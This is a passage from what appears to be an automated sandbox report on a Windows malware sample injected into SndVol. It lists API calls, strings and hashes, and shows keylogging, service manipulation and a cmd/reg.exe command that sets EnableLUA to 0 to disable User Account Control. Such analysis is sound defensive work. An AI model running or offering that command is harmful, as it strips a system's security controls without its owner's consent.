                                                                          • Part of subcall function 291420B2: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 29142129
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                        • String ID:
                                                                        • API String ID: 3950776272-0
                                                                        • Opcode ID: 7e6f520cbb15c4e540305937f4bc3ff15e27c64d2225069608144b67f24962ca
                                                                        • Instruction ID: 47c804b402f00fc12418cd526a75ccbf7c650a5d07adf041239cbccdc692e267
                                                                        • Opcode Fuzzy Hash: 7e6f520cbb15c4e540305937f4bc3ff15e27c64d2225069608144b67f24962ca
                                                                        • Instruction Fuzzy Hash: D1612570F00601ABD7149F27CD84BAA7BA5FF6C748F006129ED09AB281DB74E657CB90
                                                                        Function 2917597A Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __cftoe
                                                                        • String ID:
                                                                        • API String ID: 4189289331-0
                                                                        • Opcode ID: e7d6ca56838f51dfff2c9447782ac8305bd833e22cb3174cceaa3010851b1d7b
                                                                        • Instruction ID: 8baab279806c9ab2f645cfd6b30f297d7736cd64d3ea451055645c4feb12faf1
                                                                        • Opcode Fuzzy Hash: e7d6ca56838f51dfff2c9447782ac8305bd833e22cb3174cceaa3010851b1d7b
                                                                        • Instruction Fuzzy Hash: C351E832D00307BBDB548B6A8C81EEE77B9EF4537CF10862AE91896191EB35D702C664
                                                                        Function 04466697 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __cftoe
                                                                        • String ID:
                                                                        • API String ID: 4189289331-0
                                                                        • Opcode ID: 30f97a14dd6f87c9245b8e0b778041a74f07a421c1ac77e9beff42b74887127b
                                                                        • Instruction ID: 3b27fdb4c35c25b1e4d31e3a3d26c66f2e408fa02a0c8e21196934905780c572
                                                                        • Opcode Fuzzy Hash: 30f97a14dd6f87c9245b8e0b778041a74f07a421c1ac77e9beff42b74887127b
                                                                        • Instruction Fuzzy Hash: C451DB72900205ABEF249F6ADC40FAF77A9EF48365F15421FE817D6292DF31F9008666
                                                                        Function 2913A761 Relevance: 9.2, APIs: 6, Instructions: 163sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Sleep.KERNEL32(00001388), ref: 2913A77B
                                                                          • Part of subcall function 2913A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,2913A788), ref: 2913A6E6
                                                                          • Part of subcall function 2913A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,2913A788), ref: 2913A6F5
                                                                          • Part of subcall function 2913A6B0: Sleep.KERNEL32(00002710,?,?,?,2913A788), ref: 2913A722
                                                                          • Part of subcall function 2913A6B0: CloseHandle.KERNEL32(00000000,?,?,?,2913A788), ref: 2913A729
                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 2913A7B7
                                                                        • GetFileAttributesW.KERNEL32(00000000), ref: 2913A7C8
                                                                        • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 2913A7DF
                                                                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 2913A859
                                                                          • Part of subcall function 2914C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,2913A87E), ref: 2914C52F
                                                                        • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,29196478,?,00000000,00000000,00000000,00000000,00000000), ref: 2913A962
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                        • String ID:
                                                                        • API String ID: 3795512280-0
                                                                        • Opcode ID: 1fd75640cc282085b1b24b49bcdffd2f26483822a922c561e7ea9be7776b530c
                                                                        • Instruction ID: 72b79814d9e4473558a7472e3835653ab63619f0cd01720072b29836a95dff52
                                                                        • Opcode Fuzzy Hash: 1fd75640cc282085b1b24b49bcdffd2f26483822a922c561e7ea9be7776b530c
                                                                        • Instruction Fuzzy Hash: CA51B1317042447AEB49AB33CC54ABE77BE5FA025CFC0981CE552A71D0DF24AB0BC659
                                                                        Function 291775F1 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __freea$__alloca_probe_16_free
                                                                        • String ID: a/p$am/pm
                                                                        • API String ID: 2936374016-3206640213
                                                                        • Opcode ID: 029a3155e5dd05cc7e0f65eb00bdd38d11446768a07c288e05d058078b7006d0
                                                                        • Instruction ID: 3917732c7cf2f3d127da283de7c307b1a227f73aa5676b2466a3eaacfb5db2a2
                                                                        • Opcode Fuzzy Hash: 029a3155e5dd05cc7e0f65eb00bdd38d11446768a07c288e05d058078b7006d0
                                                                        • Instruction Fuzzy Hash: 30D1F131D00307DAEB098F6AC895BFAB7B1FF05398F15455AE604AB251E3759B43CBA0
                                                                        Function 29140E9C Relevance: 9.1, APIs: 6, Instructions: 75COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 29140EA9
                                                                        • int.LIBCPMT ref: 29140EBC
                                                                          • Part of subcall function 2913E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 2913E10D
                                                                          • Part of subcall function 2913E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 2913E127
                                                                        • std::_Facet_Register.LIBCPMT ref: 29140EFC
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 29140F05
                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 29140F23
                                                                        • __Init_thread_footer.LIBCMT ref: 29140F64
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                        • String ID:
                                                                        • API String ID: 3815856325-0
                                                                        • Opcode ID: ed905251c66ac85a2a3fab8c5a21f49eca1b2fa579d3721b9043a746e68c4ca6
                                                                        • Instruction ID: f016c881ad6bbb03f942cac6b5ad8242bfe98fa91362be04a1d28b08afc115f3
                                                                        • Opcode Fuzzy Hash: ed905251c66ac85a2a3fab8c5a21f49eca1b2fa579d3721b9043a746e68c4ca6
                                                                        • Instruction Fuzzy Hash: 97210736E00514BBCB48DBABDC8189D37B99F18368B205156E505A7290DB319F13C7D0
                                                                        Function 2914AD09 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,2914A41F,00000000), ref: 2914AD19
                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,2914A41F,00000000), ref: 2914AD2D
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,2914A41F,00000000), ref: 2914AD3A
                                                                        • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,2914A41F,00000000), ref: 2914AD6F
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,2914A41F,00000000), ref: 2914AD81
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,2914A41F,00000000), ref: 2914AD84
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                        • String ID:
                                                                        • API String ID: 493672254-0
                                                                        • Opcode ID: ab09332f0c37b9662253d4f16b1e9677386bf0393105f201e47596987eaef794
                                                                        • Instruction ID: 395d98630bcc34f8501bd1fcf8a13ef96ae19ec4de8c6f9960fac2b514363a87
                                                                        • Opcode Fuzzy Hash: ab09332f0c37b9662253d4f16b1e9677386bf0393105f201e47596987eaef794
                                                                        • Instruction Fuzzy Hash: 7C016D71A551187AE7001A379C4EFBB3B6CEB0A375F014305F624961C0DA548F06B1A1
                                                                        Function 29178295 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLastError.KERNEL32(00000020,?,2916A875,?,?,?,2916F9F8,?,?,00000020,00000000,?,?,?,2915DD92,0000003B), ref: 29178299
                                                                        • _free.LIBCMT ref: 291782CC
                                                                        • _free.LIBCMT ref: 291782F4
                                                                        • SetLastError.KERNEL32(00000000,2916F9F8,?,?,00000020,00000000,?,?,?,2915DD92,0000003B,?,00000041,00000000,00000000), ref: 29178301
                                                                        • SetLastError.KERNEL32(00000000,2916F9F8,?,?,00000020,00000000,?,?,?,2915DD92,0000003B,?,00000041,00000000,00000000), ref: 2917830D
                                                                        • _abort.LIBCMT ref: 29178313
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLast$_free$_abort
                                                                        • String ID:
                                                                        • API String ID: 3160817290-0
                                                                        • Opcode ID: c8249650f0699ecdfc73d006336e1618cb5b8bd37b1b957afa81fd8e43bd3fa1
                                                                        • Instruction ID: 129e48556b5411c6745fc30b04eb2af97da4cef8b619bc1651aefe3004dc1cd1
                                                                        • Opcode Fuzzy Hash: c8249650f0699ecdfc73d006336e1618cb5b8bd37b1b957afa81fd8e43bd3fa1
                                                                        • Instruction Fuzzy Hash: 30F0D6356007433AC345322BAC89EFA263A5BD13BDF214555F91892181EF24CB03C121
                                                                        Function 2914AB37 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,2914A6B4,00000000), ref: 2914AB46
                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,2914A6B4,00000000), ref: 2914AB5A
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,2914A6B4,00000000), ref: 2914AB67
                                                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,2914A6B4,00000000), ref: 2914AB76
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,2914A6B4,00000000), ref: 2914AB88
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,2914A6B4,00000000), ref: 2914AB8B
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                        • String ID:
                                                                        • API String ID: 221034970-0
                                                                        • Opcode ID: 9c74888c0457eb57aea36ac1eb38fd19ebaa1300705c85a4cb90a30c20541193
                                                                        • Instruction ID: f6bf960009870761054d35ce200e9a32c81f87960371eaf904c2880076917390
                                                                        • Opcode Fuzzy Hash: 9c74888c0457eb57aea36ac1eb38fd19ebaa1300705c85a4cb90a30c20541193
                                                                        • Instruction Fuzzy Hash: 14F0C271A1021C7BE7107A66DC4DDFB3B6CEB453A4F400056FD0986145EB289E06A5A5
                                                                        Function 2914AC3B Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,2914A634,00000000), ref: 2914AC4A
                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,2914A634,00000000), ref: 2914AC5E
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,2914A634,00000000), ref: 2914AC6B
                                                                        • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,2914A634,00000000), ref: 2914AC7A
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,2914A634,00000000), ref: 2914AC8C
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,2914A634,00000000), ref: 2914AC8F
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                        • String ID:
                                                                        • API String ID: 221034970-0
                                                                        • Opcode ID: bad2b8bbff119031c559e310c3bc8fa2c7ddccb3de4fc3804efdb0fb8a115c03
                                                                        • Instruction ID: c7ea9e7a6e4145211f61974109c9d62f88616b9b000c86d39613f50f34ebac15
                                                                        • Opcode Fuzzy Hash: bad2b8bbff119031c559e310c3bc8fa2c7ddccb3de4fc3804efdb0fb8a115c03
                                                                        • Instruction Fuzzy Hash: 35F0C271A5151C7BE3117A66EC4DDEB3B6CEB45354F400016FE0896140DB289E06A5E5
                                                                        Function 2914ACA2 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,2914A5B4,00000000), ref: 2914ACB1
                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,2914A5B4,00000000), ref: 2914ACC5
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,2914A5B4,00000000), ref: 2914ACD2
                                                                        • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,2914A5B4,00000000), ref: 2914ACE1
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,2914A5B4,00000000), ref: 2914ACF3
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,2914A5B4,00000000), ref: 2914ACF6
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                        • String ID:
                                                                        • API String ID: 221034970-0
                                                                        • Opcode ID: 4331a8458f5a17541dc8a84f89403c061cdf32cdb508e1e3bac7cf0a1a9dfd24
                                                                        • Instruction ID: 36aecacbb52ddb06c7aa4a396a626b6d61795c27bbd3d69944e49d6ac4f85c93
                                                                        • Opcode Fuzzy Hash: 4331a8458f5a17541dc8a84f89403c061cdf32cdb508e1e3bac7cf0a1a9dfd24
                                                                        • Instruction Fuzzy Hash: 6CF0C271A5051C7BE3117A66EC49DAB3B6CEB45355F400015FE0996140DB289E06A6E5
                                                                        Function 2914AADB Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,2914A731,00000000), ref: 2914AAE4
                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,2914A731,00000000), ref: 2914AAF9
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,2914A731,00000000), ref: 2914AB06
                                                                        • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,2914A731,00000000), ref: 2914AB11
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,2914A731,00000000), ref: 2914AB23
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,2914A731,00000000), ref: 2914AB26
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Service$CloseHandle$Open$ManagerStart
                                                                        • String ID:
                                                                        • API String ID: 276877138-0
                                                                        • Opcode ID: 863fbfa33ad5866ab5e4101559a1930d6ed9cdccbb7d080a8f61bdbb001e5a94
                                                                        • Instruction ID: 60ac5f77a6cb2637149dfab8bfb85daf610b8d5c435f9dac9e04ab3cffc94e21
                                                                        • Opcode Fuzzy Hash: 863fbfa33ad5866ab5e4101559a1930d6ed9cdccbb7d080a8f61bdbb001e5a94
                                                                        • Instruction Fuzzy Hash: B2F0E9B165152C7FF2016B22DC8CDEF276CEF85395B010015F801820409B688E4AB571
                                                                        Function 04422587 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 142COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0445551E: __onexit.LIBCMT ref: 04455524
                                                                        • __Init_thread_footer.LIBCMT ref: 044225DB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Init_thread_footer__onexit
                                                                        • String ID: PkG$XMG$NG$NG
                                                                        • API String ID: 1881088180-3151166067
                                                                        • Opcode ID: 49aca21aedc77406ad6ecb676b3e8f12959c6e3be557b7633b64e8435ff40de0
                                                                        • Instruction ID: 3933555e560da9f10e1305c3b1981d50bb28a84ff64a528ec7c7a52c59e824d9
                                                                        • Opcode Fuzzy Hash: 49aca21aedc77406ad6ecb676b3e8f12959c6e3be557b7633b64e8435ff40de0
                                                                        • Instruction Fuzzy Hash: 0741B3311042209BEB24FF26DE50AAE73A6FB85314F80456FE54A871E2DFB07D89D715
                                                                        Function 0446356E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: PkGNG
                                                                        • API String ID: 0-263838557
                                                                        • Opcode ID: 74f6752c29648a2bfd6573c6eef97cd93d5ebe8b8f6b3d74850a2027e23562c9
                                                                        • Instruction ID: 0257a3a85d481b1e04a92b63fe520da1783f8ef28c3ebfc50740c45f5077fa73
                                                                        • Opcode Fuzzy Hash: 74f6752c29648a2bfd6573c6eef97cd93d5ebe8b8f6b3d74850a2027e23562c9
                                                                        • Instruction Fuzzy Hash: CF412AB1A00744AFEB249F79C844B9ABBE9EB84714F10856FE913DB381D671B5418781
                                                                        Function 2914B71B Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 91COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 29143656: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,291A50E4), ref: 29143678
                                                                          • Part of subcall function 29143656: RegQueryValueExW.ADVAPI32(?,2913F34E,00000000,00000000,?,00000400), ref: 29143697
                                                                          • Part of subcall function 29143656: RegCloseKey.ADVAPI32(?), ref: 291436A0
                                                                          • Part of subcall function 2914C048: GetCurrentProcess.KERNEL32(?,?,?,2913DAE5,WinDir,00000000,00000000), ref: 2914C059
                                                                        • _wcslen.LIBCMT ref: 2914B7F4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                        • String ID: .exe$http\shell\open\command$program files (x86)\$program files\
                                                                        • API String ID: 37874593-4246244872
                                                                        • Opcode ID: afbfea9fe1e37198c00e56049a8675b4f33c9d6d84ab37dbc334aefb7e5bd689
                                                                        • Instruction ID: 129e3f553bf302588baf62af9d3183b704330085e5d81f76d311b55d06e528cd
                                                                        • Opcode Fuzzy Hash: afbfea9fe1e37198c00e56049a8675b4f33c9d6d84ab37dbc334aefb7e5bd689
                                                                        • Instruction Fuzzy Hash: C621B862B001047BEB48AAB68C909ED767D9F6C12CF40743DE406A7180EE249F0B4275
                                                                        Function 2913B19F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 2913B1AD
                                                                        • wsprintfW.USER32 ref: 2913B22E
                                                                          • Part of subcall function 2913A671: SetEvent.KERNEL32(?,?,00000000,2913B245,00000000), ref: 2913A69D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: EventLocalTimewsprintf
                                                                        • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                        • API String ID: 1497725170-248792730
                                                                        • Opcode ID: 7fdf2cbec7c3fa4d67f9c16513888d58e1df4f4b58c7cbba5e0125e091321171
                                                                        • Instruction ID: 2aad54df5be6d344e507c0242a253677541e1c8db90db75d5c0e43d4f73ac18b
                                                                        • Opcode Fuzzy Hash: 7fdf2cbec7c3fa4d67f9c16513888d58e1df4f4b58c7cbba5e0125e091321171
                                                                        • Instruction Fuzzy Hash: BF11D672404018BADB48EB56EC508FE77BCAF68255B80911EF40696090FF386B4BC7AC
                                                                        Function 2914D5A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegisterClassExA.USER32(00000030), ref: 2914D5EC
                                                                        • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 2914D607
                                                                        • GetLastError.KERNEL32 ref: 2914D611
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ClassCreateErrorLastRegisterWindow
                                                                        • String ID: 0$MsgWindowClass
                                                                        • API String ID: 2877667751-2410386613
                                                                        • Opcode ID: 7873ce38d3a2f94c0e8302b1552ce1f76d88ac2a6ba6a45ce39f857e3c5d7e07
                                                                        • Instruction ID: 729678846732e691084a4ec453f891c1e2277f017f7912c6fa4c22130329dbc4
                                                                        • Opcode Fuzzy Hash: 7873ce38d3a2f94c0e8302b1552ce1f76d88ac2a6ba6a45ce39f857e3c5d7e07
                                                                        • Instruction Fuzzy Hash: 3301EDB5E0021DABEB01DFA6DCC49EFBB7CFF05254F40052AF914A6140D6755A058BA0
                                                                        Function 29137790 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 291377D6
                                                                        • CloseHandle.KERNEL32(?), ref: 291377E5
                                                                        • CloseHandle.KERNEL32(?), ref: 291377EA
                                                                        Strings
                                                                        • C:\Windows\System32\cmd.exe, xrefs: 291377D1
                                                                        • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 291377CC
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseHandle$CreateProcess
                                                                        • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                        • API String ID: 2922976086-4183131282
                                                                        • Opcode ID: 64e26b864bff59579b4305f59cdd7c3199f4412f90ad1fd0f053bc3f9aeec9c7
                                                                        • Instruction ID: ba5510eccd10bd67da0bf17dc7330ed1f7193c9d52786c4ae81a62be0824b703
                                                                        • Opcode Fuzzy Hash: 64e26b864bff59579b4305f59cdd7c3199f4412f90ad1fd0f053bc3f9aeec9c7
                                                                        • Instruction Fuzzy Hash: 7DF06D72D0019C7AEB20AADB9C0DEDFBF3CEBC2B91F00055AFA04A6008DA705111CAB1
                                                                        Function 291733DA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,2917338B,?,?,2917332B,?), ref: 291733FA
                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 2917340D
                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,2917338B,?,?,2917332B,?), ref: 29173430
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                        • API String ID: 4061214504-1276376045
                                                                        • Opcode ID: 2b287653724955e0bf40e2a8bd032679ae954612204e21c1b503b25adf062204
                                                                        • Instruction ID: c8cb3bac0f8391b2ebb3de30e8ebf4db3d6fbcc8700ab9a586a7d06c975cb5b7
                                                                        • Opcode Fuzzy Hash: 2b287653724955e0bf40e2a8bd032679ae954612204e21c1b503b25adf062204
                                                                        • Instruction Fuzzy Hash: CEF04430A0424DBBDF16AFA2EC48BDDBFB5FF04355F414094E906A2154DB348A42DB90
                                                                        Function 291350E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 29135120
                                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,29134E7A,00000001), ref: 2913512C
